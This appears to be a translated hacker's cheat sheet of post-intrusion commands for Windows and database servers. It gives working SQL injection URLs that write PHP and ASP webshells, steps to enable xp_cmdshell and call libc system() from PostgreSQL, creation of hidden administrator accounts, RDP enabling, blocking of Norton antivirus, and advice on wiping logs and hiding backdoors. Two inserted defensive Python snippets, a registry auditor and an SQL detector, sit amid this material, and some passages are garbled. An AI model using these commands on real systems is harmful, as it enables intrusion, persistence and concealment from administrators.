1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank at the 3389 (RDP) logon and you log straight in; once inside, run net user administrator /passwordreq:yes to restore the setting.

2. A rather neat way to build a clone account:
First create a user-level account,
then export its registry entries, then delete the account in Computer Management,
then import the registry entries again and add the account to the administrators group.

3. Finding the radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg

4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a key named "services.exe",
then create a string value under it
whose data is the full path of the trojan.

5. runas /user:guest cmd
to test a user's privileges.

6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This actually just uses the tlntadmn command; to learn more, type tlntadmn /? and have a look. (It needs administrator privileges.) Creating an identical user and passing NTLM authentication needs no explanation from me, right?

7. After the intrusion: patching holes, cleaning traces, placing backdoors:
The basic vulnerabilities must be patched, such as SU privilege escalation and SA injection. For DBO injection, consider killing xp_treelist and xp_regread, and make a note of the web directory yourself. You absolutely must remember to clean up your traces. For SQL Server connections it is better to use Enterprise Manager; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. Do not clear the IIS logs with AIO-type tools that wipe the log completely; choose a logcleaner-type tool that deletes only the access records for a specified IP. If you can get the administrator password via GINA, log in as him to clean the logs and do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally, leave a backdoor that produces no log records. Several one-liner backdoors, a standard backdoor and a cfm backdoor: I usually leave none of them out. Remember to change the file times. And one more rather ruthless trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop reminding him that you broke in, planted a certain backdoor and added a certain user (not your real important backdoor, of course), and ask him to clean it up. That way you have a good chance of keeping your real backdoor.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
for example:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'
9. MSSQL Server 2005 has xp_cmdshell switched ON by default;
to enable it, it has to be turned on under the advanced options.
You can inject this directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then
;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then
;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedures have been deleted, there is a very simple way to restore them:
Deleting:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restoring:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly, without caring whether sp_addextendedproc still exists.

-----------------------------
Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell:
sp_dropextendedproc "xp_cmdshell"
-------------------------
Clear the 3389 logon records with one built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.

View the current user's privileges in mysql:
show grants for
The following statements give a user the same privileges as ROOT. You have probably run into this when taking a site: root's mysql account can only connect locally and refuses connections from outside. The following method solves that: the statements below create a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently operate the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to delete your footprints:

Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro`;
: { h& E: u' C$ B3 w; g+ b0 F( H
Getting SYSTEM privileges from the current user
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD

Code:
<SCRIPT LANGUAGE="VBScript">
' bind to the local machine through the WinNT ADSI provider
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
' create the user "nosec", set its password, then add it to Administrators
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec,user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Bypassing the captcha restriction to get into the admin panel and take a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save this as code.reg, import it into the registry, restart IE,
and that is it.

Writing a shell with union
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the dedecms injection vulnerability: writing a shell without the admin panel.
In the dedecms admin panel, when there is no file manager and no outfile privilege:
under Plugin Management -> Virus Scan,
write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.
In Oracle, after logging in as a low-privilege user, you can run the following statement to query the password hashes of sys and the other users, then crack them with Cain:
Code:
select username,password from dba_users;

mysql remote connection user
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the terminal services port
XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Change the terminal services port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 system firewall's restriction on terminal services port 3389 and on connecting IPs

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5. Enable the Win2000 terminal on port 3389 (reboot required)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

6. Force a reboot of Win2000 & Win2003 (the system reboots automatically after the last command)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (reboot required)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal has exceeded its maximum number of connections, connect with:

mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (everyone gets full control of the C: drive)

cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)

------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
' use the WMI registry provider on the local machine
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
' make sure the three Terminal Server keys exist
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' allow RDP connections
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' set the listening port to 3389 in both places
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' reboot immediately so the change takes effect
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Delete the awgina.dll registry value
Code:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to disable LM hashes.
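Most of the registry settings in these notes (fDenyTSConnections, the two PortNumber values, GinaDLL, NoLMHash, the Image File Execution Options key, the IE BlockXBM value, the firewall GloballyOpenPorts list, and the SpecialAccounts\UserList entry used further down to hide an account from the logon screen) can be audited from a .reg export of the host. The Python below is an added example written for this edit, not code from these notes: it parses a constructed .reg text (it accepts both the REGEDIT4 and the "Windows Registry Editor Version 5.00" header) and reports the values a defender would want flagged. The sample export, the Debugger value name under IFEO and the wording of the findings are this example's own assumptions.

```python
import re

HKLM = "HKEY_LOCAL_MACHINE"
TS = HKLM + r"\SYSTEM\CurrentControlSet\Control\Terminal Server"
WINLOGON = HKLM + r"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
IFEO = HKLM + r"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
LSA = HKLM + r"\SYSTEM\CurrentControlSet\Control\Lsa"
IE_SEC = HKLM + r"\SOFTWARE\Microsoft\Internet Explorer\Security"
FW_PORTS = HKLM + (r"\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
                   r"\FirewallPolicy\StandardProfile\GloballyOpenPorts\List")

# Constructed sample export (not from a real host): RDP enabled and moved to
# 20008, a GINA hook, a hidden account and an IFEO entry on services.exe.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="awgina.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"asp.net"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe]
"Debugger"="c:\\temp\\unknown.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000001
'''


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: (type, value)}}.
    Handles dword:, quoted strings (with \\ and \" escapes) and the
    default value '@'. Key paths keep their original case."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";") or line.upper().startswith("REGEDIT")
                or line.startswith("Windows Registry Editor")):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = re.fullmatch(r'(?:"((?:[^"\\]|\\.)*)"|@)=(.*)', line)
        if not m or current is None:
            continue
        name = m.group(1) if m.group(1) is not None else "@"
        data = m.group(2)
        if data.startswith("dword:"):
            keys[current][name] = ("dword", int(data[6:], 16))
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            keys[current][name] = ("string", data[1:-1].replace("\\\\", "\\").replace('\\"', '"'))
        else:
            keys[current][name] = ("raw", data)
    return keys


def audit(text):
    """Return a list of finding strings for the settings this page touches."""
    keys = {k.lower(): v for k, v in parse_reg(text).items()}
    findings = []

    def get(key, name):  # case-insensitive value lookup
        for n, v in keys.get(key.lower(), {}).items():
            if n.lower() == name.lower():
                return v
        return None

    v = get(TS, "fDenyTSConnections")
    if v and v[1] == 0:
        findings.append("RDP connections enabled (fDenyTSConnections=0)")
    for sub in (r"\Wds\rdpwd\Tds\tcp", r"\WinStations\RDP-Tcp"):
        v = get(TS + sub, "PortNumber")
        if v and v[1] != 3389:
            findings.append("RDP port moved to %d in %s" % (v[1], sub.strip("\\")))
    v = get(WINLOGON, "GinaDLL")
    if v:
        findings.append("custom GINA DLL configured: %s" % v[1])
    v = get(LSA, "NoLMHash")
    if v and v[1] != 1:
        findings.append("LM hash storage not disabled (NoLMHash=%d)" % v[1])
    v = get(IE_SEC, "BlockXBM")
    if v and v[1] == 0:
        findings.append("IE BlockXBM set to 0")
    for key, vals in keys.items():
        if key.startswith(IFEO.lower() + "\\"):          # any IFEO entry
            for n, (t, data) in vals.items():
                if t == "string":
                    findings.append("IFEO entry for %s: %s=%s" % (key[len(IFEO) + 1:], n, data))
        if key == (WINLOGON + r"\SpecialAccounts\UserList").lower():
            for n, (t, data) in vals.items():
                if t == "dword" and data == 0:           # account hidden from logon UI
                    findings.append("account hidden from logon screen: %s" % n)
    for n in keys.get(FW_PORTS.lower(), {}):
        findings.append("firewall port globally opened: %s" % n)
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_REG):
        print("FINDING:", f)
```

Run `reg export HKLM\SYSTEM\CurrentControlSet\Control hklm-control.reg` (and the Winlogon and Lsa keys) on the host, feed the file contents to `audit`, and compare the findings against the host's known baseline; a NoLMHash value that is absent from the export is not reported, so export the Lsa key explicitly when that check matters.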
Database security: common commands when intruding an Oracle database
Recently I ran into a server that used an Oracle database; after cramming Oracle and consulting the experts I finally got hold of all the user passwords of the site's admin interface. I found Oracle really cumbersome to operate, so to spare my brothers some detours later, I have compiled the commands that were necessary during the intrusion.
1. su - oracle: not required; suited to the case where you have no DBA password, since it lets you enter the sqlplus interface without one.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba; (as sysoper) or
connect internal/oracle AS SYSDBA; (scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$database; view the database structure fields
7. How to see which users have the SYSDBA / SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user; shows the user of the current database connection
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show all field definitions of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in the CQI.T_BBS_XUSER table:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges to the user:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change database users' passwords (set the sys and system passwords to test):
alter user sys identified by test;
alter user system identified by test;
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml    database connection configuration
\WEB-INF\server.xml    roughly the equivalent of http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml    file and directory structure

spring.properties contains the name of the hibernate.cfg.xml file

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these can be found, have a look at the class files.
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
View the shared folders inside a virtual machine:
run this in the VM's cmd:
\\.host\Shared Folders

Tricks for finding the terminal (RDP) service from a cmdshell
Finding the terminal service:
Step 1: Tasklist /SVC lists all processes, the system services and their corresponding PID values; the service name of the terminal service is TermService.
Step 2: use netstat -ano to list all ports with their PID values, and find the port that corresponds to that PID.
Query the password hash in SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'

Exporting a shell from Access:
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

Complete code for adding a user through mysql on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;
Notes on how to deal with the pesky Norton
Check the path of the Norton service:
sc qc ccSetMgr
Then set permissions to deny access. Go all the way:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That takes care of it. But when you are done, remember to restore the permissions:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F

SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
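The last statement splits master..xp_cmdshell across concatenated string literals, so a naive substring match for the procedure name in captured SQL misses it. As an added example for this edit (not code from these notes), the Python below normalizes a T-SQL statement the way a detection rule would, by stripping comments, joining adjacent 'a'+'b' literals, collapsing whitespace and lowercasing, and then flags the procedures and settings that the xp_cmdshell, sp_oacreate, addextendedproc, xp_dirtree and bcp notes on this page rely on. The sample statements are taken from this page (plus one benign enumeration query as a negative case); the category labels are this example's own.

```python
import re

# Constructed sample statements: the ones from this page, plus a benign
# STUFF/FOR XML enumeration query that the rule should not flag.
SAMPLES = [
    "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    "id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--",
    'dbcc addextendedproc("xp_cmdshell","xplog70.dll")',
    "declare @shell int exec sp_oacreate 'wscript.shell',@shell output "
    "exec sp_oamethod @shell,'run',null,'cmd.exe /c whoami'",
    "SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where "
    "xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1",
    r"exec master..xp_cmdshell 'bcp test.dbo.test out \\10.0.0.9\d$\t\1.txt "
    r"-c -Slocalhost -Uuser -Ppass'",
]

# A T-SQL string literal: '...' with '' as the escaped quote.
LITERAL = r"'((?:[^']|'')*)'"
JOIN = re.compile(LITERAL + r"\s*\+\s*" + LITERAL)
PROCS = ("xp_cmdshell", "sp_oacreate", "sp_oamethod", "xp_dirtree", "xp_regread")


def normalize_tsql(stmt):
    """Undo the cheap obfuscations: comments, 'ma'+'ster' literal
    concatenation (repeated until stable), whitespace runs and case."""
    s = re.sub(r"/\*.*?\*/", " ", stmt, flags=re.S)   # block comments
    s = re.sub(r"--[^\n]*", " ", s)                    # line comments
    while True:
        joined = JOIN.sub(r"'\1\2'", s)                # 'a'+'b' -> 'ab'
        if joined == s:
            break
        s = joined
    return re.sub(r"\s+", " ", s).strip().lower()


def classify(stmt):
    """Return the list of labels triggered by one statement (empty = clean)."""
    s = normalize_tsql(stmt)
    hits = []
    if re.search(r"sp_configure\s*'\s*xp_cmdshell\s*'\s*,\s*1\b", s):
        hits.append("enable xp_cmdshell via sp_configure")
    if "addextendedproc" in s:                         # sp_addextendedproc / dbcc addextendedproc
        hits.append("extended procedure (re)registration")
    hits.extend(p for p in PROCS if p in s)
    if re.search(r"\bbcp\b.*\bout\b", s):              # bulk export to a file/share
        hits.append("bcp export")
    return hits


if __name__ == "__main__":
    for stmt in SAMPLES:
        print(classify(stmt) or ["clean"], "<-", stmt[:60])
```

Feed it the statement text from SQL Server audit or trace output (or the query string of a web request, decoded) one statement at a time; the rule only names the procedures used in these notes, so the enumeration query in the last sample is reported as clean even though it is still worth logging.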
Some things about postgresql injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a custom libc function, the other uses pl/python.
Of course, for these the postgresql database version must be above 8.X.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Execute the shell command, redirecting its output to a file:
SELECT system('uname -a > /tmp/test')

copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the echoed output back from the output table to tell whether execution succeeded:
SELECT system_out FROM stdout

Below is a test example

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess    stop the default firewall
netsh firewall show config    show the default firewall's configuration
netsh firewall set notifications disable    disable the notification shown when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost    add a program to the default firewall's allowed list
, F) s1 k& ^5 i9 u& Z: V修改3389端口方法(修改后不易被扫出)
: @% `0 a- Z L3 c+ i修改服务器端的端口设置,注册表有2个地方需要修改& \! M/ ?! z) l5 V+ p3 f' N
! t5 Y$ y1 t' S, t. w6 d8 d
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
" o/ A1 b1 q- z5 t8 oPortNumber值,默认是3389,修改成所希望的端口,比如6000
% i) I- ?) q' g0 K, a d. C+ Q1 F+ u& }# W; p5 }
第二个地方:8 Y+ { {! k* P) T, B i
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 5 Z& N) e9 F" d, n- W$ L, t
PortNumber值,默认是3389,修改成所希望的端口,比如6000
: ^6 i) `! W: A; n a# j9 @6 P( x k2 R9 i
现在这样就可以了。重启系统就可以了2 Q3 t; @$ m# q5 ^. L
+ |. K# l, r4 Z) k# ?; E
查看3389远程登录的脚本
" R' z3 V4 ]2 b9 B: b1 [保存为一个bat文件
" g, e' D9 c& k* z" }date /t >>D:\sec\TSlog\ts.log
9 v$ x- f5 V4 k$ h/ g4 M+ Btime /t >>D:\sec\TSlog\ts.log
4 l6 N# {# q) t( Gnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log' s5 k5 r- }( E/ U+ h& C5 a1 ~
start Explorer
7 ^4 \* a3 W4 a) _
mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.

/v:<server[:port]> -- specifies the terminal server to connect to.

/console -- connects to the console session of the server.

/f -- starts the client in full-screen mode.

/w:<width> -- specifies the width of the remote desktop screen.

/h:<height> -- specifies the height of the remote desktop screen.

/edit -- opens the specified .rdp file for editing.

/migrate -- migrates legacy connection files created with Client Connection Manager
to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which amounts to logging on to the computer a second time. In other words, connecting with the console parameter gets you the desktop that is shown on the monitor. Give it a try; it comes in handy sometimes, especially with some software.
mstsc /console /v:124.42.126.xxx    gets around the limit on the number of terminal connections
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
